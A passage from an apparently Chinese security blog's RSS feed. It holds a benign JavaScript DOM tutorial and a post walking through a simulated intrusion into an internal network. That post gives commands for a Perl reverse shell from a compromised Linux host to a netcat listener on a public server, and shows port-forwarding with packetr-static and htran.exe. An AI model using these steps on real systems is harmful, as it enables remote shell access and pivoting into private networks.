class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span">
<p style="margin: 12px 0px 0px; line-height: 18px;"><strong>示例代码:</strong></p>
<p style="margin: 12px 0px 0px; line-height: 18px;"><font size="2"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><strong>getElementById()   <br />
</strong></span></span></span></span></span></span></span></span></font></p>
<p style="margin: 12px 0px 0px; line-height: 18px;"><font size="2"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><strong>
<div class="codeText">
<div class="codeHead"><strong>XML/HTML代码</strong></div>
<ol start="1" class="dp-xml">
    <li class="alt"><span><span class="tag"><strong>&lt;</strong></span><span class="tag-name"><strong>p</strong></span><span><strong>&nbsp;</strong></span><span class="attribute"><strong>id</strong></span><span><strong>=</strong></span><span class="attribute-value"><strong>&quot;testId&quot;</strong></span><span class="tag"><strong>&gt;</strong></span><span><strong>&nbsp;&nbsp;</strong></span></span></li>
    <li class=""><span><strong>这个段落是为了展示 getElementById()方法访问DOM节点的。<span class="tag">&lt;</span><span class="tag-name">br</span><span>&nbsp;</span><span class="tag">/&gt;</span><span>&nbsp;&nbsp;</span></strong></span></li>
    <li class="alt"><span><strong>&nbsp;&nbsp;<span class="tag">&lt;</span><span class="tag-name">img</span><span>&nbsp;</span><span class="attribute">src</span><span>=</span><span class="attribute-value">&quot;../../images/logo.gif&quot;</span><span>&nbsp;</span><span class="attribute">alt</span><span>=</span><span class="attribute-value">&quot; 展示如何访问DOM&quot;</span><span>&nbsp;</span><span class="tag">/&gt;</span><span class="tag">&lt;</span><span class="tag-name">br</span><span>&nbsp;</span><span class="tag">/&gt;</span><span>&nbsp;&nbsp;</span></strong></span></li>
    <li class=""><span><span class="tag"><strong>&lt;/</strong></span><span class="tag-name"><strong>p</strong></span><span class="tag"><strong>&gt;</strong></span><span><strong>&nbsp; <br />
    </strong></span></span></li>
</ol>
</div>
</strong></span></span></span></span></span></span></span></span></font></p>
</span></span></span></span></span></span></span></span></font></p>
<p style="margin: 12px 0px 0px; line-height: 18px;"><font size="2"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span">
<div class="codeText">
<div class="codeHead">JavaScript代码</div>
<ol start="1" class="dp-c">
    <li class="alt"><span><span>&lt;script&nbsp;type=</span><span class="string">&quot;text/javascript&quot;</span><span>&gt;&nbsp;&nbsp;</span></span></li>
    <li class=""><span>&nbsp;<span class="keyword">function</span><span>&nbsp;hide(){&nbsp;&nbsp;</span></span></li>
    <li class="alt"><span>&nbsp;document.getElementById(<span class="string">&quot;testId&quot;</span><span>).style.display&nbsp;=&nbsp;</span><span class="string">&quot;none&quot;</span><span>&nbsp;;&nbsp;&nbsp;&nbsp;</span></span></li>
    <li class=""><span>&nbsp;}&nbsp;&nbsp;</span></li>
    <li class="alt"><span>&nbsp;<span class="keyword">function</span><span>&nbsp;show(){&nbsp;&nbsp;</span></span></li>
    <li class=""><span>&nbsp;document.getElementById(<span class="string">&quot;testId&quot;</span><span>).style.display&nbsp;=&nbsp;</span><span class="string">&quot;block&quot;</span><span>&nbsp;;&nbsp;&nbsp;&nbsp;</span></span></li>
    <li class="alt"><span>&nbsp;}&nbsp;&nbsp;</span></li>
    <li class=""><span>&nbsp;&lt;/script&gt;&nbsp;&nbsp;&nbsp;</span></li>
    <li class="alt"><span>&hellip;&hellip;&nbsp;&nbsp;</span></li>
    <li class=""><span>&lt;form&nbsp;action=<span class="string">&quot;#&quot;</span><span>&gt;&nbsp;&nbsp;</span></span></li>
    <li class="alt"><span>&lt;button&nbsp;onclick=<span class="string">&quot;hide();&nbsp;return&nbsp;false;&quot;</span><span>&nbsp;value=</span><span class="string">&quot;隐藏&quot;</span><span>&nbsp;&gt;把它吃掉&lt;/button&gt;&nbsp;&nbsp;</span></span></li>
    <li class=""><span>&lt;button&nbsp;onclick=<span class="string">&quot;show();&nbsp;return&nbsp;false;&quot;</span><span>&nbsp;value=</span><span class="string">&quot;显示&quot;</span><span>&nbsp;&gt;把它吐出来&lt;/button&gt;&nbsp;&nbsp;</span></span></li>
    <li class="alt"><span>&lt;/form&gt;&nbsp;&nbsp;</span></li>
</ol>
</div>
此例中是以testid作为选择 条件</span></span></span></span></span></span></span></span></font></p>
<p style="margin: 12px 0px 0px; line-height: 18px;"><font size="2"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><strong>getElementsByTagName()</strong></span></span></span></span></span></span></span></span></font></p>
<p style="margin: 12px 0px 0px; line-height: 18px;"><font size="2"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span"><span style="border-collapse: separate; color: rgb(0, 0, 0); font-family: STHeiti; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; font-size: medium;" class="Apple-style-span"><span style="font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px; text-align: left;" class="Apple-style-span">
<div class="codeText">
<div class="codeHead">JavaScript代码</div>
<ol start="1" class="dp-c">
    <li class="alt"><span><span>&lt;script&nbsp;type=</span><span class="string">&quot;text/javascript&quot;</span><span>&gt;&nbsp;&nbsp;</span></span></li>
    <li class=""><span><span class="keyword">function</span><span>&nbsp;allPara(){&nbsp;&nbsp;</span></span></li>
    <li class="alt"><span><span class="comment">//paras存储所有段落</span><span>&nbsp;&nbsp;</span></span></li>
    <li class=""><span>paras&nbsp;=&nbsp;document.getElementsByTagName(<span class="string">&quot;p&quot;</span><span>);&nbsp;&nbsp;</span></span></li>
    <li class="alt"><span><span class="comment">//paraNum循环变量，用于选中每个单独的段落</span><span>&nbsp;&nbsp;</span></span></li>
    <li class=""><span><span class="keyword">var</span><span>&nbsp;paraNum;&nbsp;&nbsp;</span></span></li>
    <li class="alt"><span><span class="comment">//从零开始循环，paras.length是段落节点的个数</span><span>&nbsp;&nbsp;</span></span></li>
    <li class=""><span><span class="keyword">for</span><span>&nbsp;(</span><span class="keyword">var</span><span>&nbsp;paraNum=0;paraNum&lt;paras.length;paraNum++)&nbsp;&nbsp;</span></span></li>
    <li class="alt"><span>&nbsp;{&nbsp;&nbsp;&nbsp;</span></li>
    <li class=""><span>&nbsp;&nbsp;<span class="comment">//操作：给段落设置边框。</span><span>&nbsp;&nbsp;</span></span></li>
    <li class="alt"><span>&nbsp;&nbsp;paras[paraNum].style.border&nbsp;=&nbsp;<span class="string">&quot;1px&nbsp;dashed&nbsp;pink&quot;</span><span>;&nbsp;&nbsp;&nbsp;&nbsp;</span></span></li>
    <li class=""><span>&nbsp;}&nbsp;&nbsp;</span></li>
    <li class="alt"><span>}&nbsp;&nbsp;</span></li>
    <li class=""><span>&lt;/script&gt; <br />
    </span></li>
</ol>
</div>
</span></span></span></span></span></span></span></span></font></p>
</span></span></p>
</span></span></span></span></span></span></font></p><br /><br /><a href="http://www.normb.net/?action=show&amp;id=30" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.normb.net/?action=show&amp;id=30</link>
			<category domain="http://www.normb.net/?cid=2">Coder</category>
			<pubDate>2010-08-27 00:47</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=28</guid>
			<title>字符注射的温习</title>
			<author>admin</author>
			<description>文章需要输入密码才能浏览.</description>
			<link>http://www.normb.net/?action=show&amp;id=28</link>
			<category domain="http://www.normb.net/?cid=1">Security</category>
			<pubDate>2010-08-17 01:32</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=27</guid>
			<title>xss的一些个例情况</title>
			<author>admin</author>
			<description>文章需要输入密码才能浏览.</description>
			<link>http://www.normb.net/?action=show&amp;id=27</link>
			<category domain="http://www.normb.net/?cid=1">Security</category>
			<pubDate>2010-07-23 10:09</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=26</guid>
			<title>堆栈攻击-协议分析</title>
			<author>admin</author>
			<description><![CDATA[<p>上图:</p>
<p><img src="http://www.normb.net/attachments/date_201006/thumb_61b2d56ca78598e44ecc006cfa8e2da0.jpg" alt="" /></p><br /><br /><a href="http://www.normb.net/?action=show&amp;id=26" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.normb.net/?action=show&amp;id=26</link>
			<category domain="http://www.normb.net/?cid=4">System</category>
			<pubDate>2010-06-13 07:58</pubDate>
		</item>
		<item>
			<guid>http://www.normb.net/?action=show&amp;id=25</guid>
			<title>Linux下的内网反弹实例</title>
			<author>admin</author>
			<description><![CDATA[<p>遇到一个案例,细节不表,把在案例中的操作方法在本机模拟了下,记录之.</p>
<p>环境:</p>
<p>被攻陷的Linux主机(拿到root权限)-----模拟为我内网的一台Linux服务器 192.168.0.105</p>
<p>hack的操作用机-----我的电脑 192.168.1.101</p>
<p>反弹到公网的服务器-----我自己的公网服务器&nbsp;61.160.2xx.xxx</p>
<p>渗透测试用的windows测试机&nbsp; 192.168.1.109</p>
<p>工具:</p>
<p>packetr-static&nbsp; Linux下的</p>
<p>htran.exe&nbsp;&nbsp; windows下的</p>
<p>sockcap 用作代理进入内网渗透的利器</p>
<p>过程:</p>
<p>1.我模拟下极度苛刻的情况下的环境,该攻陷的Linux服务器对外不开放22,只存在web端口80,那么我们必须得反弹shell到公网的机器上,这点我虚拟机里面没 这个环境,我就直接说下简要的</p>
<p>上传back.pl文件到linux下的tmp目录下,执行</p>
<p>perl /tmp/back.pl xxx.xxx.xxx.xxx 端口</p>
<p>在公网的服务器上,运行nc执行</p>
<p>nc -l -v -p 端口(跟上面的一样)</p>
<p>现在我弹2个窗口回来,一个开代理,一个转发数据</p>
<p>把packetr-static传上去,执行</p>
<p>./packetr-static -s 1988</p>
<p><img alt="" src="http://www.normb.net/attachments/date_201005/b5f22b47532a437c5c054558faca8c1f.jpg" /></p>
<p>&nbsp;</p>
<p>一个窗口转发数据,执行</p>
<p>./packetr-static -slave 61.160.20x.xxx 123 127.0.0.1 1988</p>
<p><img alt="" src="http://www.normb.net/attachments/date_201005/thumb_7adf1dfdfec95829f692ba3fc4ee25b4.jpg" /></p>
<p>&nbsp;</p>
<p>2.在windows公网端执行,</p>
<p>htran.exe -p -listen 123 1988</p>
<p><a href="http://www.normb.net/attachments/date_201005/ec7df6f92093cd8275a0098e1dce615c.jpg"><img alt="" src="http://www.normb.net/attachments/date_201005/ec7df6f92093cd8275a0098e1dce615c.jpg" /></a></p>
<p>&nbsp;</p>
<p>3.配置sockcap</p>
<p><img alt="" src="http://www.normb.net/attachments/date_201005/75100274492471875891a9bbf943bf1a.jpg" /></p>
<p>&nbsp;</p>
<p>4.运行代理程序进入内网</p>
<p><img alt="" src="http://www.normb.net/attachments/date_201005/thumb_ea1a69963227965243e76150fdbbf1fe.jpg" /></p>
<p>&nbsp;</p><br /><br /><a href="http://www.normb.net/?action=show&amp;id=25" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.normb.net/?action=show&amp;id=25</link>
			<category domain="http://www.normb.net/?cid=1">Security</category>
			<pubDate>2010-05-15 01:27</pubDate>
		</item>
	</channel>
</rss>

